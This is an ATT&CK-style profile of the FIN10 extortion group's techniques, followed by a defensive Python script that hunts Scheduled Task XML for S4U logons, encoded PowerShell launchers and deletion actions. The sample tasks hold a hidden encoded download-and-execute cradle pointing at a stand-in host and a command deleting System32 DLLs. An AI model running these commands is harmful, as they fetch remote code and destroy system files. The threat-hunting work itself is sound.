Group: FIN10

FIN10
Group
ID: G0051
Aliases: FIN10

FIN10 is a financially motivated threat group that has targeted organizations in North America from at least 2013 through 2016. The group exfiltrates data from victims and uses the stolen data to extort the victim organizations.[1]

Techniques Used

  • PowerShell - FIN10 uses PowerShell for execution and uses PowerShell Empire to establish persistence.[1][2]
  • Scheduled Task - FIN10 has established persistence by using S4U tasks (scheduled tasks that run under an S4U logon, which does not require a stored password for the account) as well as the Scheduled Task option in PowerShell Empire.[1][2]
  • Scripting - FIN10 has executed malicious .bat files containing PowerShell commands.[1]
  • Valid Accounts - FIN10 has used stolen credentials to connect remotely to victim networks through VPNs protected by only a single authentication factor. The group has also moved laterally using the local Administrator account.[1]
  • Remote File Copy - FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.[1]
  • File Deletion - FIN10 has used batch scripts and scheduled tasks to delete critical system files.[1]
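As an added example (it is not part of this ATT&CK page and not code from any of the referenced reports), the following Python script shows one way to hunt across exported Windows Scheduled Task definitions for the scheduled-task tradecraft listed above: tasks that run under an S4U logon, tasks whose action launches PowerShell with an encoded command the way the PowerShell Empire launcher does, and tasks whose action line deletes files. It assumes the task XML produced by `schtasks /query /xml /tn <name>` or `Export-ScheduledTask`; the three sample tasks, their names, the `example.invalid` URL and the launcher one-liner are constructed for the example, not captured from any intrusion.

```python
"""Hunt exported Scheduled Task XML for S4U tasks, encoded PowerShell
launchers and file-deleting actions. Input is the XML written by
`schtasks /query /xml /tn <name>` or `Export-ScheduledTask`.
The three tasks at the bottom are constructed sample input."""
import base64
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
POWERSHELL_BINARIES = {"powershell.exe", "powershell", "pwsh.exe", "pwsh"}
# cmd.exe built-ins plus the PowerShell cmdlet and its aliases
DELETE_COMMANDS = {"del", "erase", "rd", "rmdir", "remove-item", "rm", "ri"}


def is_encoded_flag(token):
    """True for -EncodedCommand and every prefix powershell.exe accepts
    (-e, -en, -enc, ...) plus its documented -ec alias."""
    flag = token.lstrip("-/").lower()
    return flag == "ec" or (flag != "" and "encodedcommand".startswith(flag))


def decode_encoded_command(arguments):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE),
    or None when the argument string carries no decodable payload."""
    tokens = arguments.split()
    for i, token in enumerate(tokens[:-1]):
        if is_encoded_flag(token):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def _text(root, path):
    return (root.findtext(path, default="", namespaces=TASK_NS) or "").strip()


def analyze_task(xml_text):
    """Parse one task definition; return its name, logon type, action and a
    list of findings (empty when nothing in the definition looks suspicious)."""
    root = ET.fromstring(xml_text)
    name = _text(root, "t:RegistrationInfo/t:URI")
    logon_type = _text(root, "t:Principals/t:Principal/t:LogonType")
    command = _text(root, "t:Actions/t:Exec/t:Command")
    arguments = _text(root, "t:Actions/t:Exec/t:Arguments")
    decoded = decode_encoded_command(arguments)

    findings = []
    if logon_type.upper() == "S4U":
        findings.append("s4u_logon")
    binary = command.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()
    if binary in POWERSHELL_BINARIES or "powershell" in arguments.lower():
        findings.append("powershell_exec")
    if decoded is not None:
        findings.append("encoded_command")
    # Token match (not substring) so a base64 blob cannot produce a false hit.
    tokens = {t.strip("\"'()").lower()
              for t in f"{command} {arguments} {decoded or ''}".split()}
    if tokens & DELETE_COMMANDS:
        findings.append("file_deletion")
    return {"name": name, "logon_type": logon_type, "command": command,
            "arguments": arguments, "decoded": decoded, "findings": findings}


def hunt(xml_docs):
    """Run analyze_task over many exported tasks and keep only the hits."""
    return [r for r in map(analyze_task, xml_docs) if r["findings"]]


def make_task_xml(name, logon_type, command, arguments):
    """Build a minimal task definition in the Task Scheduler schema
    (constructed sample input for this example, not a captured file)."""
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<RegistrationInfo><URI>{escape(name)}</URI></RegistrationInfo>"
        f'<Principals><Principal id="Author"><LogonType>{escape(logon_type)}</LogonType>'
        "</Principal></Principals>"
        f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
        f"<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>"
    )


# Empire-style launcher: UTF-16LE, base64-encoded, passed with -Enc. The
# one-liner and URL are constructed for the example.
LAUNCHER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/launcher.ps1')"
ENCODED = base64.b64encode(LAUNCHER.encode("utf-16-le")).decode()

SAMPLE_TASKS = [  # constructed: one benign task, one S4U launcher, one deletion task
    make_task_xml(r"\Microsoft\Windows\Time Synchronization\SynchronizeTime",
                  "InteractiveToken", r"%windir%\system32\sc.exe", "start w32time task_started"),
    make_task_xml(r"\Updater", "S4U", "powershell.exe", f"-NoP -NonI -W Hidden -Enc {ENCODED}"),
    make_task_xml(r"\Cleanup", "Password", r"C:\Windows\System32\cmd.exe",
                  r'/c del /f /q "C:\Windows\System32\*.dll"'),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_TASKS):
        print(hit["name"], hit["logon_type"], hit["findings"])
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The encoded-command check matches tokens rather than a fixed `-EncodedCommand` string because powershell.exe accepts any unambiguous prefix of the parameter name, so a launcher using `-e` or `-enc` would otherwise slip past. The deletion check is deliberately token-based: a substring regex over the raw arguments would eventually hit `rm` or `del` inside a base64 payload. Point `hunt()` at the XML collected from many hosts and triage anything that comes back with `s4u_logon` or `encoded_command` first.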